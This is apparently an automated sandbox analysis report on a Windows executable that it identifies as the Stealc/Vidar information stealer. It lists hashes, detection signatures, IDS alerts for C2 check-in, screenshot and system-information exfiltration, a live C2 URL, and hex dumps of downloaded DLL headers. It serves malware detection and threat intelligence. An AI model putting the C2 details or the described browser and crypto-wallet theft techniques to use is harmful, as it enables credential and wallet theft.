Windows Analysis Report
gYjK72gL17.exe

Overview

General Information

Sample name: gYjK72gL17.exe
renamed because original name is a hash value
Original sample name: 05dc698e49fce4efae5872eb54f19767.exe
Analysis ID: 1580418
MD5: 05dc698e49fce4efae5872eb54f19767
SHA1: 29cfcfbbb21aefabe7c57a057dcf0335cb4a0ac0
SHA256: 86a95ebe542d3aed78191cf9bb40d86b7986b338e50941bf7db1ed5008a4e027
Tags: exeStealcuser-abuse_ch
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Monitors registry run keys for changes
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: gYjK72gL17.exe Avira: detected
Antivirus detection for URL or domain
Source: 185.231.69.191/f190e2808a5419c3.php Avira URL Cloud: Label: malware
Source: http://185.231.69.191/f190e2808a5419c3.php Avira URL Cloud: Label: malware
Found malware configuration
Source: gYjK72gL17.exe.4512.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "185.231.69.191/f190e2808a5419c3.php"}
Multi AV Scanner detection for submitted file
Source: gYjK72gL17.exe ReversingLabs: Detection: 15%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C996C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C996C80
Uses 32bit PE files
Source: gYjK72gL17.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49908 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: gYjK72gL17.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: gYjK72gL17.exe, 00000000.00000002.2613874448.000000006C9FD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: gYjK72gL17.exe, 00000000.00000002.2614092949.000000006CBDF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: gYjK72gL17.exe, 00000000.00000002.2614092949.000000006CBDF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: gYjK72gL17.exe, 00000000.00000002.2613874448.000000006C9FD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49709 -> 185.231.69.191:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49709 -> 185.231.69.191:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.231.69.191:80 -> 192.168.2.6:49709
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49709 -> 185.231.69.191:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.231.69.191:80 -> 192.168.2.6:49709
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49709 -> 185.231.69.191:80
Source: Network traffic Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.6:49787 -> 185.231.69.191:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 185.231.69.191/f190e2808a5419c3.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 13:02:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 13:02:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 13:02:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 13:02:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 13:02:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 